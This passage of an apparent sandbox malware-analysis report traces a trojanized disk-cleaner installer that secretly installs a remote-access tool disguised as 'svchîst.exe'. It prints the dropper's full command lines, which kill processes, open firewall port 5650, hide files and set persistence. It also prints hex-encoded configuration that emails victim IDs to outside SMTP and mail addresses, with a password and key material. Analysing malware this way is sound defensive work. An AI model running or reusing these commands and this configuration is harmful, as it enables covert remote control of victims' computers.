55457652537479546b6c534f4645315a486734636770495a6b3935513035435930706a543142436545526e596d786165586c76596b78456244637a5a484d315a30464d5a454a6953584e4662554e4b5333464b5a464572654651774e317033563156774b31597852557047436d526c656b786e4b314a345157644e516b464252554e6e5a305642566d523051586833646b74434b32524964444657536a5a774e556874536b357051565635516e6c45614578685154524f57484e6b513352746130674b5933686a4d6b3556526d7049556e427152577454545567794e5551774f555a4d6455394f625642566330706f556b3548644668775933706e5757464e596d77724f444e335930563451334e51625556495553746e554170455a474e5056324659656b7835536d4a4b4d69394d4b314578626a4274655445726133467164336734654752725457524f524556346130467554456c7254315a6d6456527a637a6b324d474a474c336c545a57744d436c704b65564e53536b6c4e537a633453586b7262335a4f6446644b4c326b725131706d55476446524556796247467457446848616b4e4653315a4364473177616a686f4e574a4864315a51545668474c3239466248514b5933704662546453537a5a73616d4a424e6c6f7a5530467864327835616b78585931704855307051536b3877546d4e525430356e4b31464356484e566253396b566a6c7364446c7a65444273516a6c5a596a5a4562777044617a425356484e47643052484b335a68515652685a546c5159545235617a527161544d344d5856725a30313253565a5864546c4a4d6c464c516d645252455931624870345153394353556c485356707253326f34436b525a615752584c79744b656e6f7a4d57524962304a7565484a304e4768614c337031553349334e4756434b336452656a52704e444e555a30786c656e6c305957745a644452745a6a4269566d6c46624535594d6c594b4e6b6c6b576b56484e544e30576d7445533156484f56557753444a6d65474e50546c4a6e52576843565734796147397055336f72566b5a334e454e61544842784d5456765a464a714f455a6c544849344e57524657516f324e444e715355637252304649546b5251616d6c75626b526d57456c3564315243643074435a314645526b567a51564e56546b67305247647657546446624774784b334d3053446c5a513074445956564a4d6e6335436a683457557831566b356d5769746e5531463156545657536e524b4d6c5a4c5155684c625730344e55647a59303533617a513162336f77563074555a484e4c565574684e476c514e6d51724f55314c596d5675537a494b54336455616a4d796446423554444252546d316a5a584655566e564954444a794e324e6d4d6939305433564a5a6a4a48634539535a454578616d557a55486c6e6555355662334e425644464364306c526546647557416f76556c52554d6b55795633683353304a6e516c645652334e7752546468654642784e6b74344c315a7a54325279613049775557784d655746314e79746162544e785754524c64585978555841726343396e596a4252436d6b355445566b546d316c4e325977654768694e6d3961516d4a5257545a4d576d49784c3070534d584255545734336348426a53486f77557a466f525556514b32746f517a52776455527964464e544e445a714d6d634b5455677855586c356430317057554e4756487061596b7776616b5a4e6146673463476869654656444d58686a5a465577545770555a31553352575a57596d396e4f556b7a5233706e566a6c426230644351557071645170346145783362564e44643252495230637a51316335636b5a75646d6c79627a6c33613070325a334d3153566445526d4d33616b453161555654656d315254444a6d4d553835656b644a557a4e44656e52464d7a424a436c56444e5739585a30466e56336c72623235715458646955335635656d67325a475a744c7a6c6f51585668626c59335a336449647a4e33566b4a576144523563484a33596a4a566445746955575a54556b74485156674b616b704565566c544d44464d59304578533255334d457377596c6f305a44647a5554465256575a3152466c544d5535706347744f4f5546765230466d554464776557745a566d6c4d593152555131564d556d39705741704a645668356156565356484677646d4a47627a564e5557395054304e4d4d484a424e55707864324532597a564d617a56524d6b5a6d564642525a476c485132684262473034596c4a79563252575a3235474d484e53436e6f77613159766248597a65444a7356464a5063334e4452565a4953476c79523141314d6b4a706456463151586c474f58597a5a47684b6144527553575a794c7a6450646e64304d7a646a55486c304f474d7262486f4b626b685252585242566c6c525358557956325179615564744d336778566a6739436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Token: SeBackupPrivilege N/A C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4340 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 4340 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 4340 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 4340 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 4340 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 4340 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1800 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1800 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1800 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 528 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 528 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 528 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 528 wrote to memory of 1196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 528 wrote to memory of 1196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 528 wrote to memory of 1196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4340 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 4340 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 4340 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 1800 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1800 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1800 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1800 wrote to memory of 4576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 4576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 4576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1800 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1800 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 876 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
PID 876 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
PID 876 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
PID 1800 wrote to memory of 4252 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1800 wrote to memory of 4252 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1800 wrote to memory of 4252 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1800 wrote to memory of 1372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1800 wrote to memory of 1372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1800 wrote to memory of 1372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1372 wrote to memory of 1492 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 1492 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 1492 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 1712 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 1712 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 1712 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2988 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2988 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2988 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 116 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 116 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 116 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 4632 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
PID 4632 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
PID 4632 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
PID 1492 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1492 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1492 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2988 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2988 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2988 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 116 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 116 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 116 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1712 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1712 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1712 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 4464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe

"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f

C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

"C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening TCP 5650 "Open Port 5650"

C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp" /SL5="$40028,3793825,188928,C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650

C:\Windows\SysWOW64\drivers\install.exe

"C:\Windows\System32\drivers\install.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f7